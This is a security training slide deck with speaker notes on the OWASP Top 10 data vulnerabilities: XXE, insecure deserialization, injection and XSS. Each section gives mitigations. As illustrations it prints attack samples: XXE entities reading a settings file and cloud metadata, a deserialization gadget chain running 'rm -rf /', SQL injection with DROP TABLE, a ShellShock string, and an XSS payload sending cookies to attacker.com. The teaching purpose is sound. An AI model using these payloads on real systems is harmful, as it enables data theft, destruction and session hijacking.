% OWASP Top 10 - Data Vulnerabilities
% Javier Eduardo Rojas Romero
% January, 2021

# OWASP Top 10 - Data Vulnerabilities

## OWASP

**O**pen **W**eb **A**pplication **S**ecurity **P**roject (OWASP)

Publications
: **OWASP Top 10**, Mobile Security Testing Guide, Software Assurance Maturity Model, ...

Tools
: Zed Attack Proxy, Dependency Check, ...

::: notes

Hello,

As several of you probably know, the OWASP Top 10 is a list of the most frequent
vulnerabilities found in web applications today.

It's worth mentioning who OWASP is: the Open Web Application Security Project is
a non-profit foundation that has existed since 2001.

They maintain several security-related resources, both publications and
software packages; the best known of those is the OWASP Top 10, but there
are also others, like the Mobile Security Testing Guide, proxies for traffic
analysis, etc.

:::

## OWASP Top 10

![](top10cats.png)

::: notes

This is the current Top 10. I've grouped the entries: the group on the right is
operations-related, meaning issues that arise when operating an application, like
using old library versions or not configuring your services securely. This
mostly concerns devops.

The other group, at the bottom, is about bad practices when implementing authentication and
authorization in a web application.

And the final group, which will be the focus of this talk, is about
vulnerabilities related to processing user data, which I prefer to call untrusted data, or hostile data.

:::

# XML External Entities (XXE)

## XXE

::: notes

An XML External Entity attack takes advantage of an XML feature called Document
Type Definitions; I'm not an XML expert, so apologies for any mistakes in what
I'll say next, but, basically, these DTDs allow you to specify **inside a
document** what kind of tags can appear in the document, inside which tags, how
many of them, etc., to sort of extend the concept of what is a valid XML
document.

And, while they can be useful, they should only be used with trusted data.

This first example is known as the Billion Laughs Attack; in it,
the attacker defines a piece of text (the lol here), and then defines another
piece of text by saying "repeat that first piece of text X times", and then
another one that repeats the second piece of text several times, and so on and
so forth.

When trying to parse this text, the parser first has to resolve those
definitions, and when doing that, it will have to use lots of memory and CPU, so
this becomes a Denial of Service attack.
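
To put numbers on it, here is a rough sketch that computes how long the text
becomes once every entity is expanded. The class and method names are made up
for this illustration, and it assumes that every level repeats the previous one
the same number of times.

```java
import java.math.BigInteger;

// Hypothetical helper, for illustration only: estimates the size of a
// fully expanded "billion laughs" style entity.
final class EntityExpansion {

    // baseLength: characters in the innermost entity ("lol" has 3)
    // fanout:     how many times each level repeats the previous level
    // levels:     how many nested entities are defined on top of the base one
    static BigInteger expandedLength(int baseLength, int fanout, int levels) {
        return BigInteger.valueOf(baseLength)
                .multiply(BigInteger.valueOf(fanout).pow(levels));
    }

    public static void main(String[] args) {
        // The document on the slide: 3 levels, each repeating 3 times
        System.out.println(expandedLength(3, 3, 3));
        // The classic attack: 9 levels, each repeating 10 times
        System.out.println(expandedLength(3, 10, 9));
    }
}
```

The version on the slide only expands to 81 characters; the classic version,
with nine levels of ten repetitions each, expands to 3,000,000,000 characters.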

It's worth mentioning that this kind of thing can also happen with YAML, and in
general you also have to be very paranoid when processing YAML files.

Now, if the parsed XML is somehow shown back to whoever sent it (for example,
to report an error validating the received XML), more attacks are possible.

This other example abuses the fact that those definitions can live not only
inline, but also in external files. If we assume that the attacker can guess the
location of important files (and there are several system files with well-known
locations), he can trick the XML parser into loading those files and returning
their contents.

Another possibility is loading those definitions from a URL; with this, an
attacker can leak information, as shown here, explore your internal network, or
even escalate and make requests while impersonating the server that he
attacked.

:::

. . .

<pre><code class="xml" data-line-numbers>&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE lolz [
 &lt;!ENTITY lol &quot;lol&quot;&gt;
 &lt;!ELEMENT lolz (#PCDATA)&gt;
 &lt;!ENTITY lol1 &quot;&amp;lol;&amp;lol;&amp;lol;&quot;&gt;
 &lt;!ENTITY lol2 &quot;&amp;lol1;&amp;lol1;&amp;lol1;&quot;&gt;
 &lt;!ENTITY lol3 &quot;&amp;lol2;&amp;lol2;&amp;lol2;&quot;&gt;
]&gt;
&lt;lolz&gt;&amp;lol3;&lt;/lolz&gt;
</code></pre>

. . .

<pre><code class="xml" data-line-numbers="4">&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;
&lt;!DOCTYPE foo [
&lt;!ELEMENT foo ANY &gt;
&lt;!ENTITY xxe SYSTEM &quot;file:///srv/webapp/conf/settings.py&quot; &gt;]&gt;
&lt;foo&gt;&amp;xxe;&lt;/foo&gt;
</code></pre>

. . .

<pre><code class="xml" data-line-numbers="4">&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;
&lt;!DOCTYPE foo [
&lt;!ELEMENT foo ANY &gt;
&lt;!ENTITY xxe SYSTEM &quot;http://169.254.169.254/latest/meta-data/&quot; &gt;]&gt;
&lt;foo&gt;&amp;xxe;&lt;/foo&gt;
</code></pre>


## XXE - Vectors

::: notes

When should you be concerned about this kind of attack? Whenever you receive an
XML document, and try to parse it, and in particular, when you try to
**validate** it.

Now, when do we put ourselves in a situation where we have to parse XML
documents?

When we build a SOAP API.

Or when our application uses SAML.

Or when we open XML-based documents, like Excel spreadsheets or GPS traces.

Or when we process vector graphics with SVG.

:::

* SOAP
* SAML (SSO)
* XML-based documents (.docx, .odt, .gpx)
* SVG
* ...

## XXE - Mitigations

::: notes

So, what can you do if you have to handle XML files?

A first approach is to avoid the problem altogether: use a data format other
than XML that is simpler to parse.

But if you have to, nowadays parsers have options to disable DTD handling, so
you can try that.

Also, and while it's not a 100% safe solution, you can put a Web Application
Firewall in place, which should help you stop the most common attacks.

:::


  * DO NOT XML
  * Configure your parser properly
    * Disable DTDs
  * WAFs\*
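
As a minimal sketch of what "Disable DTDs" can look like with the DOM parser
that ships with the JDK: this assumes the default, Xerces-derived
implementation, which is the one that understands the `disallow-doctype-decl`
feature; other parsers need different switches. `SafeXml` and its methods are
names invented for this example.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Hypothetical helper, for illustration only.
final class SafeXml {

    // Builds a parser that refuses any document containing a DOCTYPE,
    // which rules out both entity expansion and external entities.
    static DocumentBuilder newHardenedBuilder() throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf.newDocumentBuilder();
    }

    // Returns true if the XML parses, false if the parser rejects it.
    static boolean accepts(String xml) {
        try {
            Document doc = newHardenedBuilder().parse(
                    new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return doc.getDocumentElement() != null;
        } catch (Exception e) {
            return false;
        }
    }

    public static void main(String[] args) {
        System.out.println(accepts("<foo>bar</foo>"));
        // Rejected at the DOCTYPE, before any entity is resolved
        System.out.println(accepts("<!DOCTYPE foo [<!ENTITY xxe SYSTEM "
                + "\"file:///srv/webapp/conf/settings.py\">]><foo>&xxe;</foo>"));
    }
}
```

Rejecting the DOCTYPE outright is the bluntest option; it only works if none of
your legitimate documents carry one.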

# Insecure Deserialization

## Insecure Deserialization

::: notes

Now, insecure deserialization. Serialization is used when some application wants
to save an instance of a class, perhaps send it to someone else, and get it back
later, for example in an event-driven architecture, or to store the session data
of a user.

This shows a simplified example of what a serialized object looks like, in this
case using JSON: you put there the class name of the object, its attributes, and
the values of each attribute.

Or as you can see in this other example, you can of course have an attribute
that is another object instance.

Now, this is fine, and can be useful, but the problem is that when processing a
serialized object, we are letting the attacker manipulate what objects we should
create, because he has control of the class names, and it's possible for him to
put together a set of instances that abuse the deserialization mechanism to
execute whatever code he wants, when the data is deserialized.

In this example, a couple of classes are connected so that, when
deserialized, they execute a command under control of the attacker.

:::

<pre><code class="json" data-line-numbers="">{
  "class": "com.endava.models.Transaction",
  "attributes": {
    "amount": "50.3",
    "originAccount": "29",
    "destinationAccount": "10"
  }
}
</code></pre>

. . .

<pre><code class="json" data-line-numbers="|2,5">{
  "class": "com.endava.utils.CacheManager",
  "attributes": {
    "initHook": {
      "class": "com.endava.utils.CommandTask",
      "attributes": {
        "command": "rm -rf /"
      }
    }
  }
}
</code></pre>

## Insecure Deserialization

::: notes

The attacker here found a class that lets him define a command in an attribute,
and run that command as part of a method call, ...

and then he found another class, that has an attribute with the type he needs, ...

and that also runs the method he wants on that attribute, as part of the deserialization protocol.

Now, this code is just an example, and you may be asking yourself how the
attacker knows about these classes; the thing with these attacks is that they
can use any class that is available to your application: not only the classes
you wrote, but also those of the framework you use, and everything else in your
classpath.

So most of these attacks just assume that you are using a popular library, like
Apache Commons, and build a chain out of classes from there; the individual
classes are called gadgets, and the chain is called a gadget chain.

:::


<pre><code class="java" data-line-numbers="12,13,16|3,4|5,8,14">import java.io.*;

public class CacheManager implements Serializable {
    private Runnable initHook;
    private void readObject(ObjectInputStream ois)
            throws IOException, ClassNotFoundException {
        ois.defaultReadObject();
        initHook.run(); // invoked automatically during deserialization
    }
}

class CommandTask implements Runnable, Serializable {
    private String command;
    public void run() {
        try {
            Runtime.getRuntime().exec(command); // attacker-controlled string
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }
}</code></pre>

## Insecure Deserialization - Impact

::: notes

While these vulnerabilities are not that easy to automate, they have a
tremendous impact; at the very least, you are exposed to denial of service, and
it's basically downhill from there: you can get data corruption,
privilege escalation, and even remote code execution.

:::


* Denial of Service
* Application state manipulation
* Remote Code Execution

## Insecure Deserialization - Vectors

::: notes

So, when should you be concerned? Serialization is used in several scenarios,
like remote procedure calls, sending messages between microservices, or
passing messages through queues or streams.

Sometimes you also see it being used for caching, where the developer
serializes the object he wants to cache and stores it in the cache.

Another rather common use is to store the session data for a user in a cookie
in a web application.

The example I showed used Java, where it's a fairly common issue, but this kind
of problem can appear in libraries for many languages.

:::

::::::: {.columns}

::: {.column width="50%"}

* RPC/IPC
  * Message brokers, web services, etc.
* Caches, storage
* Tokens, user sessions

:::

::: {.column width="50%"}

* Java
* .NET
* Python
* PHP
* ...

:::

:::::::

## Insecure Deserialization - Vectors

::: notes

Keep in mind that people also refer to serialization using other terms, like
pickling, marshalling, or freezing.

Also, keep in mind that it doesn't really matter what format is used for
serializing: YAML, JSON, or some specific binary format. None of them is safer
than the others as long as they instantiate arbitrary classes; that's the source
of the vulnerability.

:::


::::::: {.columns}

::: {.column width="50%"}

* Pickle
* Marshalling
* Serializing
* Freezing

:::

::: {.column width="50%"}

* XML
* YAML
* JSON
* ...

:::

:::::::

## Insecure Deserialization - Mitigations

::: notes

How can you avoid these problems if you have to process serialized objects that
you don't fully trust?

As usual, the easiest way is to not have the problem: don't use serialization
if you can help it.

Now, if you have to, there are some alternatives. The first one is to use
something simpler, like plain JSON, and re-create your objects manually;
that way you are in control of what objects you create, using what classes, etc.

Or, perhaps, sign the objects when you serialize them, and check the signature
before deserializing them; this way you can make sure that nobody has modified
the object. This sounds easy, but it's usually hard to do unless
your framework helps you.

The other alternative is to look for a deserialization library written with
these issues in mind, and to check its documentation really carefully.

Now, those last two mitigations have a little star because they are not
foolproof, or because they are quite complicated to use properly. If you can,
avoid them, and settle for a simpler alternative.

That's about it regarding deserialization.

:::


* Don't
* Just Don't
* ...
* Use a simpler mechanism
* Sign it\*
* Use a secure deserialization library\*
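
A minimal sketch of the "Sign it" idea, using the HMAC support in the JDK. The
class and method names are made up for this example, and it leaves out the hard
parts (where the key lives, how it is rotated, how the tag travels with the
payload), which is exactly why this mitigation carries a star.

```java
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.MessageDigest;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

// Hypothetical helper, for illustration only.
final class SignedPayload {

    // Computes an HMAC-SHA256 tag over the serialized bytes.
    static byte[] sign(byte[] payload, byte[] key) {
        try {
            Mac mac = Mac.getInstance("HmacSHA256");
            mac.init(new SecretKeySpec(key, "HmacSHA256"));
            return mac.doFinal(payload);
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    // Call this BEFORE handing the payload to any deserializer.
    static boolean isAuthentic(byte[] payload, byte[] tag, byte[] key) {
        // MessageDigest.isEqual compares the two tags in constant time
        return MessageDigest.isEqual(sign(payload, key), tag);
    }

    public static void main(String[] args) {
        byte[] key = "demo-key-do-not-reuse".getBytes(StandardCharsets.UTF_8);
        byte[] payload = "serialized-object-bytes".getBytes(StandardCharsets.UTF_8);
        byte[] tag = sign(payload, key);
        System.out.println(isAuthentic(payload, tag, key));
    }
}
```

The check only proves that the bytes were produced by someone holding the key;
it does nothing if the key leaks or if the signer itself serializes hostile data.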

# Injection

## Injection

::: notes

Now, let's talk about injection. An injection attack happens when we use data
from our users as part of commands for other systems, and we don't restrict what
kinds of data we allow into that command.

The typical example is SQL injection; here we see a piece of code that builds
the string for a query and puts the user data into it. When used with safe data,
it generates a proper SQL query.

But, since we are not making sure that the data is restricted to integers, in
this case, the attacker can extend the data to achieve, for example,

privilege escalation,

or data manipulation.

:::

<pre><code class="java">Query HQLQuery = session.createQuery(
    "FROM accounts WHERE custID="
    + request.getParameter("id"));
</code></pre>

::::::: {.columns}

::: {.column width="50%"}

<div class="fragment" data-fragment-index="1">
<pre><code class="plaintext" data-trim>
id=48
</code></pre>
</div>

:::

::: {.column width="50%"}


<div class="fragment" data-fragment-index="1">
<pre><code class="sql">SELECT *
FROM accounts
WHERE custID=48
</code></pre>
</div>

:::

:::::::

::::::: {.columns}

::: {.column width="50%"}


<div class="fragment" data-fragment-index="2">
<pre><code class="plaintext" data-trim>
id=999%20OR%20custID%3D1
</code></pre>
</div>

:::

::: {.column width="50%"}

<div class="fragment" data-fragment-index="2">
<pre><code class="sql">SELECT *
FROM accounts
WHERE custID=999 OR custID=1
</code></pre>
</div>

:::

:::::::

::::::: {.columns}

::: {.column width="50%"}

<div class="fragment" data-fragment-index="3">
<pre><code class="plaintext" data-trim>
id=48%3B%20DROP%20TABLE%20accounts
</code></pre>
</div>

:::

::: {.column width="50%"}

<div class="fragment" data-fragment-index="3">
<pre><code class="sql">SELECT *
FROM accounts
WHERE custID=48; DROP TABLE accounts
</code></pre>
</div>

:::

:::::::
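
Since `id` is supposed to be an integer, one inexpensive check is to parse it
strictly before it gets anywhere near a query string. The sketch below is only
an illustration with made-up names; it complements parameterized queries and
does not replace them.

```java
import java.util.OptionalLong;

// Hypothetical helper, for illustration only.
final class CustomerId {

    // Accepts only a plain run of 1 to 18 decimal digits; anything else
    // (spaces, quotes, "OR", ";") is rejected instead of being passed on.
    // 18 digits always fit in a long, so parseLong cannot overflow here.
    static OptionalLong parse(String raw) {
        if (raw == null || !raw.matches("[0-9]{1,18}")) {
            return OptionalLong.empty();
        }
        return OptionalLong.of(Long.parseLong(raw));
    }

    public static void main(String[] args) {
        System.out.println(parse("48").isPresent());
        System.out.println(parse("999 OR custID=1").isPresent());
        System.out.println(parse("48; DROP TABLE accounts").isPresent());
    }
}
```

With this in place, the second and third inputs from the slides are rejected
before any SQL is built.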

## Injection - Vectors

::: notes

Now, this vulnerability is called injection, and not only SQL injection, because
injection can happen in many contexts: for example, in environment variables or
commands to be run in a shell, in regular expressions, where it could cause a
denial of service, or in things like Active Directory, where you expose yourself
to tampering with the directory, or to information leaks.

It's also worth mentioning `eval()`: it's a function that takes a string and
executes it as real code. It is convenient, but you should never use it with
untrusted data. I mention it because it's not unusual to see people parsing a
JSON string in JavaScript with it.

:::

* shell commands/environment variables
* Regexps
* LDAP/Active Directory
* `eval` (Ruby, Python, **JavaScript**, ...)

## Injection - not only SQL

::: notes

As an example, in 2014 it was found that it was possible to trick Bash, the most
common system shell on UNIX systems, into executing arbitrary code, just by
passing an environment variable to it.

This was a really bad problem, because there were (and there are) many
applications exposed to the Internet that do this sort of thing.

The example on the right shows how an attacker could use a URL argument to
perform an attack, using the fact that those arguments are converted into
environment variables in certain kinds of web applications.

This forced updates to all the Linux distributions, Macs, everything.

:::

ShellShock, 2014:

::::::: {.columns}

::: {.column width="50%"}

<pre><code class="sh">x='() { :;}; echo vulnerable'</code></pre>

:::

::: {.column width="50%"}

<pre><code class="plaintext">https://website.com?x=%27%28%29%20%7B%20%3A%3B%7D%3B%20echo%20vulnerable%27</code></pre>

:::

:::::::

Impact: Linux, OS X, \*BSD

## Injection - Mitigations

::: notes

Again, what can be done about injection?

When it comes to SQL injection, using an ORM like JPA or Hibernate will protect
you, but keep in mind that even with those libraries it's possible to create an
injection vulnerability when you build your queries by hand, without
parameterizing them.

The best defense is to escape your data; as I said, the ORM usually handles this
for you. Keep in mind that you must escape depending on context: the rules for
escaping SQL are different from the rules for escaping a shell command, so you
can't just escape the data, store it, and then trust it and use it in different
contexts.

Another measure you can put in place is, again, a web application firewall, but
once again remember that it won't cover you completely, only against automated
attacks, which are not that sophisticated.

:::


* Use your ORM carefully
* Escape your data **according to context** before use
* WAFs\*

# Cross Site Scripting (XSS)

## Previous attacks

::: notes

In the previous vulnerabilities, the target was always the server: the goal was
to take data out of it, or to gain control of that server.

:::


![](attack-on-server.png){ width=100% }

## XSS

::: notes

But in a cross site scripting attack, it's the user who is the target, and the
server is merely an involuntary collaborator in the attack.

In the previous attacks, the attacker abuses the trust the system gives to its
users, but in cross site scripting attacks the attacker abuses the trust the
users give to the system; in this case, as a user, I'm not expecting that the
website of my bank will attack me, but that's exactly what happens here.

:::


![](attack-on-user.png)

## XSS

::: notes

So, how does this work?

Let's assume that we have an ecommerce website, where you can buy things, and
you can also write reviews of the things you purchased; the code we see here is
generating part of the page for a product, the section that shows the reviews:
it takes the reviews of all the users, and puts those texts into the page.

However, since this code doesn't escape HTML, but instead trusts what it read
from the database, an attacker could write a comment like this, which injects a
bit of code that steals the user's session: when the browser reads this
HTML, it will run that JavaScript to read all the cookies, including the one for
the session, and then submit them to a website the attacker controls.

And this happens not only with HTML; here we can see a different attack, that
takes advantage of the fact that you can put JavaScript code in a link.

:::


<pre><code class="java" data-trim>
userReviews += &quot;&lt;p class=&apos;userReview&apos;&gt;&quot;
   + product.userReviews[i]
   + &quot;&lt;/p&gt;&quot;;
</code></pre>

. . .

<pre><code data-trim class="plaintext">
This sucks!&lt;/p&gt;
&lt;script&gt;document.location=&apos;http://www.attacker.com/cgi-bin/cookie.cgi?foo=&apos;+document.cookie&lt;/script&gt;
&lt;p&gt;
</code></pre>

. . .

<pre><code data-trim class="html">
&lt;p class=&apos;userReview&apos;&gt;This sucks!&lt;/p&gt;
&lt;script&gt;document.location=&apos;http://www.attacker.com/cgi-bin/cookie.cgi?foo=&apos;+document.cookie&lt;/script&gt;
&lt;p&gt;&lt;/p&gt;
</code></pre>


## XSS - Vectors

::: notes

Where are you vulnerable to cross site scripting? Whenever you use any user data
to generate ANY part of an HTML page: not only the body, but also tag names,
or any property, like classes.

Also when generating URLs, or even CSS; you can get an attack from any of those
places.

And of course, when generating JavaScript, or even JSON.

This is a problem whenever you generate any of those kinds of files, either by
hand or with a template engine, like Thymeleaf in Java or the Django template
engine in Python.

And this is not only a problem for backend developers; you also have to keep
it in mind as a frontend developer. In any framework, like React, Vue, or
others, it's possible to expose yourself to a cross site scripting attack. The
frameworks do protect you from lots of common mistakes, but not all of them, and
you still have to watch out.

An additional vector is files uploaded by the user: although it's unusual,
images have been used to inject JavaScript into websites.

:::


::::::: {.columns}

::: {.column width="50%"}

* HTML
  * Body
  * Tag names
  * Prop. names/values
* URLs
* CSS
* JavaScript
* JSON
* Attachments/Uploads

:::

::: {.column width="50%"}

![](xss-vectors.png)

:::

:::::::


## XSS - Impact

::: notes

The usual consequence of this kind of attack is JavaScript execution in the
user's browser.

That usually means that the user session is compromised, and the attacker can
impersonate the user, at least in principle, and take over the account; this is
especially problematic because it could allow an attacker to steal an account
with admin privileges.

Another kind of consequence is malware delivery; for example, code that hijacks
your browser and makes it work as a bitcoin miner. And, more recently, malware in
ecommerce websites that captures credit card numbers and submits them to the
attacker.

:::


* Code Execution on the user's browser
  * Session hijacking
  * Access to browser Local Storage
  * Malware delivery

## XSS - Mitigations

::: notes

As usual, what to do about this?

First of all, be strict when validating primitive data types, like numbers or
plain strings.

But the main thing to consider is: you must escape your data, right before you
use it, according to the context where you want to use it; for example, the
rules for escaping text in the HTML context are different from those for
escaping text in the URL context, and also different from those in the
JavaScript context.

An important note: it's better to look for an escaping library that has been
vetted from a security point of view; don't write your own. The best resource
here is the OWASP website; they maintain an index of these tools for several
languages.

It's also possible to ask the browser for help: the `Content-Security-Policy`
header allows you to say things like "all inline JavaScript is forbidden", or
"only JavaScript coming from the application can be trusted". This helps a lot,
but doesn't excuse you from responsibility.

Regarding files uploaded by users, the best approach is to store them, and to
serve them, from a different domain than the one used by your application; that
way, even if someone manages to sneak JavaScript into those files and load them
in a page somehow, it won't be able to affect your application, as long as you
use Content Security Policy.

Regarding cookies and sessions, make sure that your web application configures
its cookies as `HttpOnly`; those are cookies that can't be accessed via
JavaScript, so that's a good security measure, in addition to escaping/encoding,
etc.

:::


* Escape data right before use, **according to context**
* Use `Content-Security-Policy`
* Host user files in a **separate** domain
* Use `HttpOnly` cookies
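
To make "escape according to context" concrete, here is a deliberately tiny
sketch of escaping for one context only: text placed between HTML tags or
inside a quoted attribute value. The names are made up, and it is here to show
the idea, not to be copied; in real code, use a vetted encoding library, and
note that URLs, JavaScript and CSS each need different rules.

```java
// Hypothetical helper, for illustration only; not a vetted encoder.
final class HtmlText {

    // Replaces the five characters that let text break out of an HTML
    // body or quoted-attribute context with their entity equivalents.
    static String escape(String untrusted) {
        StringBuilder out = new StringBuilder(untrusted.length() + 16);
        for (int i = 0; i < untrusted.length(); i++) {
            char c = untrusted.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        String review = "This sucks!</p><script>alert(1)</script><p>";
        // The review is escaped right before it is placed into the page
        System.out.println("<p class='userReview'>" + escape(review) + "</p>");
    }
}
```

Escaped this way, the hostile review from the earlier slide is rendered as
visible text instead of being interpreted as markup.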

## XSS - Mitigations

::: notes

An additional mitigation is to just use a modern templating framework for
generating HTML,

but without forgetting that none of these frameworks is completely immune
to the problem; all of them offer you ways of adding data without escaping it.
That's convenient, and in some cases necessary to do what you want, but it's
important to understand that using a framework doesn't make you automatically
secure; it can be misused.

:::

* Use modern templating engines ... **carefully**

<pre><code data-trim class="javascript">
return &lt;h1&gt;Hello, {user_supplied}&lt;/h1&gt;;
</code></pre>

. . .

<pre><code data-trim class="html">
&lt;div dangerouslySetInnerHTML={{__html: user_supplied}} /&gt;
</code></pre>

# OWASP resources

## OWASP resources


The OWASP Top 10 pages give you:

::: incremental

* Criteria to determine if your application might be exposed (arch./devel POV)
* How susceptible to automation each attack is (devops POV)
* Suggested mitigations (devel POV)
* Attack examples (QA/Sec. POV)
* How to test an application to assess vulnerability (QA/Sec. POV)

:::

## Thanks!

## References - XXE

  * <https://pypi.org/project/defusedxml/>: example documents, along with
    explanations of the different security issues to be aware of when parsing
    XML.

## References - Insecure Deserialization

  * <https://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles>: a
    more in-depth presentation of the topic, presenting attacks, and discussing
    mitigations and why they are/are not useful to stop the issue.

## References - Injection

  * <https://pulsesecurity.co.nz/articles/postgres-sqli>: a step-by-step
    discussion of how to take advantage of an improperly configured PostgreSQL
    server and a SQL Injection failure to achieve Remote Code Execution.

## References - XSS

  * <https://pragmaticwebsecurity.com/articles/spasecurity/react-xss-part1.html>:
    A three-part series about what kind of XSS attacks are possible in React
    nowadays (2020), and how to guard against them.
  * <https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html>: XSS prevention, server side.
  * <https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html>: XSS prevention, client side.